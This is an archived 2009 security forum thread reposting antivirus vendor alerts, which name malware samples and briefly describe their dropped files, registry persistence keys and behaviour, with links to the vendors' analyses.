HolidayBuyer's Guide

Spyware, Viruses, & Security forum

General discussion

VIRUS \ SPYWARE ALERTS - July 21, 2009

by Marianna Schmudlach / July 21, 2009 12:23 AM PDT
Discussion is locked
You are posting a reply to: VIRUS \ SPYWARE ALERTS - July 21, 2009
The posting of advertisements, profanity, or personal attacks is prohibited. Please refer to our CNET Forums policies for details. All submitted content is subject to our Terms of Use.
Track this discussion and email me when there are updates

If you're asking for technical help, please be sure to include all your system info, including operating system, model number, and any other specifics related to the problem. Also please exercise your best judgment when posting in the forums--revealing personal information such as your e-mail address, telephone number, and address is not recommended.

You are reporting the following post: VIRUS \ SPYWARE ALERTS - July 21, 2009
This post has been flagged and will be reviewed by our staff. Thank you for helping us maintain CNET's great community.
Sorry, there was a problem flagging this post. Please try again now or at a later time.
If you believe this post is offensive or violates the CNET Forums' Usage policies, you can report it below (this will not automatically remove the post). Once reported, our moderators will be notified and the post will be reviewed.
Collapse -
W32/AutoRun-AMH
by Marianna Schmudlach / July 21, 2009 12:24 AM PDT
Collapse -
Troj/RootKit-GH
by Marianna Schmudlach / July 21, 2009 12:25 AM PDT
Collapse -
Troj/Poison-BA
by Marianna Schmudlach / July 21, 2009 12:26 AM PDT
Collapse -
Troj/MDrop-CEE
by Marianna Schmudlach / July 21, 2009 12:26 AM PDT
Collapse -
Troj/Iframe-CN
by Marianna Schmudlach / July 21, 2009 12:27 AM PDT
Collapse -
Troj/Drop-DB
by Marianna Schmudlach / July 21, 2009 12:28 AM PDT
Collapse -
Troj/Agent-KPQ
by Marianna Schmudlach / July 21, 2009 12:29 AM PDT

Category

* Viruses and Spyware

Type

* Trojan


Affected operating systems Windows
Characteristics

* Installs itself in the registry


Troj/Agent-KPQ is a Trojan for the Windows platform.

When first run Troj/Agent-KPQ copies itself to <User>\Application Data\Microsoft\systemkernal.exe.

The following registry entry is created to run systemkernal.exe on startup:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
systemkernal.exe
<User>\Application Data\Microsoft\systemkernal.exe

http://www.sophos.com/security/analyses/viruses-and-spyware/trojagentkpq.html?_log_from=rss

Collapse -
Mal/Fakecor-B
by Marianna Schmudlach / July 21, 2009 12:30 AM PDT
Collapse -
Mal/Behav-314
by Marianna Schmudlach / July 21, 2009 12:30 AM PDT
Collapse -
Troj/Bckdr-QWW
by Marianna Schmudlach / July 21, 2009 12:31 AM PDT
Collapse -
Mal/EncPk-JI
by Marianna Schmudlach / July 21, 2009 12:32 AM PDT
Collapse -
Troj/Bckdr-QWW
by Marianna Schmudlach / July 21, 2009 12:33 AM PDT
Collapse -
Mal/EncPk-JI
by Marianna Schmudlach / July 21, 2009 12:33 AM PDT
Collapse -
Troj/VB-EFM
by Marianna Schmudlach / July 21, 2009 12:34 AM PDT
Collapse -
Troj/DwnLdr-HUQ
by Marianna Schmudlach / July 21, 2009 12:35 AM PDT
Collapse -
Troj/DwnLdr-HUP
by Marianna Schmudlach / July 21, 2009 12:36 AM PDT
Collapse -
Troj/Dloadr-CQJ
by Marianna Schmudlach / July 21, 2009 12:37 AM PDT
Collapse -
OSX/Jahlav-C
by Marianna Schmudlach / July 21, 2009 12:38 AM PDT

Category

* Viruses and Spyware

Type

* Trojan


Affected operating systems Macintosh

OSX/Jahlav-C is a Trojan created for the Mac OS X operating system. OSX/Jahlav-C is used to deliver malicious code to the infected computer. The initial installer is distributed as a missing Video ActiveX Object, as described on the SophosLabs blog.

OSX/Jahlav-C creates a malicious shell script file named AdobeFlash in the /Library/Internet Plug-Ins folder and sets it to run periodically. The script contains another shell script in an encoded format which in turn contains a Perl script with the main malicious payload.

The Perl script uses http to communicate with a remote website and download code supplied by the attacker.

http://www.sophos.com/security/analyses/viruses-and-spyware/osxjahlavc.html?_log_from=rss

Collapse -
Agent.avzq.
by Marianna Schmudlach / July 21, 2009 12:39 AM PDT

Real-world viruses vs computer viruses

Tuesday, July 21, 2009

We recently saw this malicious file being spread in emails. The name of the file was Novel H1N1 Flu Situation Update.exe and the icon made it look like a Word document file.

When the file was opened, it created several new files to the hard drive:

* %windir%\Temp\Novel H1N1 Flu Situation Update.doc
* %windir%\Temp\doc.exe
* %windir%\Temp\make.exe
* %windir%\system32\UsrClassEx.exe
* %windir%\system32\UsrClassEx.exe.reg


The executables contain backdoor functionality, including an elaborate keylogger.

And the document file that is dropped gets automatically opened by the malware, causing the user to think he really opened a Word file. This is what the document looks like.

More: http://www.f-secure.com/weblog/

Collapse -
SpySniper
by Marianna Schmudlach / July 21, 2009 12:40 AM PDT
Collapse -
Worm:VBS/HeadTail.A
by Marianna Schmudlach / July 21, 2009 12:41 AM PDT

Name : Worm:VBS/HeadTail.A
Category: Malware
Type: Worm
Platform: VBS

Summary
F-Secure Antivirus products had a brief false alarm with this detection. A clean file called avh_fsav_800_bin was detected as being infected on 21st of July 2009. This has now been fixed. If the avh_fsav_800_bin file was removed, it will be recreated automatically and there is no need for further action by the user. We apologize for any inconvenience.


Additional Details
Worm:VBS/HeadTail.A is a Visual Basic Script worm that propagates by copying itself to available removable, fixed, and remote drives.

It is also able to delete predefined files and processes.

More: http://www.f-secure.com/v-descs/worm_vbs_headtail_a.shtml

Collapse -
Adware-BHO.gen.d!150accdd926b
by Marianna Schmudlach / July 21, 2009 12:55 AM PDT

Type
Program
SubType
Adware
Discovery Date
07/21/2009

This software is not a virus or a Trojan. It is detected as a "potentially unwanted program" (PUP). PUPs are any piece of software that a reasonably security- or privacy-minded computer user may want to be informed of and, in some cases, remove. PUPs are often made by a legitimate corporate entity for some beneficial purpose, but they alter the security state of the computer on which they are installed, or the privacy posture of the user of the system, such that most users will want to be aware of them.

Avert

Collapse -
W32/Scribble-B
by Marianna Schmudlach / July 21, 2009 2:36 AM PDT

Aliases

* Virus.Win32.Virut.ce
* PE_VIRUX.A
* Virus:Win32/Virut.BM
* Win32:Vitro

Category

* Viruses and Spyware

Type

* Virus


How it spreads

* Infected files

Affected operating systems Windows

W32/Scribble-B is a family of polymorphic viruses for the Windows platform.

Members of W32/Scribble-B allow a remote attacker to gain access and control over the infected computer through IRC channels.

Members of W32/Scribble-B infect files with the EXE and SCR extensions when they are opened or run.

Members of W32/Scribble-B inject a malicious iframe into files whose extensions start with HTM, PHP or ASP, with affected files detected as Troj/Fujif-Gen. At the time of writing the iframe points to a site that hosts more malware.

Members of W32/Scribble-B also add a line to the Windows HOSTS file to redirect the infected computer to an infected website.

http://www.sophos.com/security/analyses/viruses-and-spyware/w32scribbleb.html?_log_from=rss

Collapse -
W32/Autorun-AMJ
by Marianna Schmudlach / July 21, 2009 3:02 AM PDT

Category

* Viruses and Spyware

Type

* Worm


Affected operating systems Windows
Characteristics

* Installs itself in the registry


W32/Autorun-AMJ is a worm for the Windows platform.

When W32/Autorun-AMJ is installed the following files are created:

<Temp>\suicide.bat
<System>\csrcs.exe

The following registry entry is created to run csrcs.exe on startup:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
csrcs
<System>\csrcs.exe

The following registry entry is changed to run csrcs.exe on startup:

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Shell
Explorer.exe csrcs.exe

Registry entries are set as follows:

More: http://www.sophos.com/security/analyses/viruses-and-spyware/w32autorunamj.html?_log_from=rss

Collapse -
Troj/Zbot-GS
by Marianna Schmudlach / July 21, 2009 3:02 AM PDT
Collapse -
Troj/Mdrop-CED
by Marianna Schmudlach / July 21, 2009 3:03 AM PDT
Collapse -
Troj/Inject-IK
by Marianna Schmudlach / July 21, 2009 3:04 AM PDT
Collapse -
Troj/Dloadr-CQK
by Marianna Schmudlach / July 21, 2009 3:05 AM PDT
Collapse -
Troj/BHO-MZ
by Marianna Schmudlach / July 21, 2009 3:05 AM PDT
Collapse -
Troj/Agent-KPS
by Marianna Schmudlach / July 21, 2009 3:06 AM PDT
Popular Forums
icon
Computer Newbies 10,686 discussions
icon
Computer Help 54,365 discussions
icon
Laptops 21,181 discussions
icon
Networking & Wireless 16,313 discussions
icon
Phones 17,137 discussions
icon
Security 31,287 discussions
icon
TVs & Home Theaters 22,101 discussions
icon
Windows 7 8,164 discussions
icon
Windows 10 2,657 discussions

HOLIDAY GIFT GUIDE 2017

Cameras that make great holiday gifts

Let them start the new year with a step up in photo and video quality from a phone.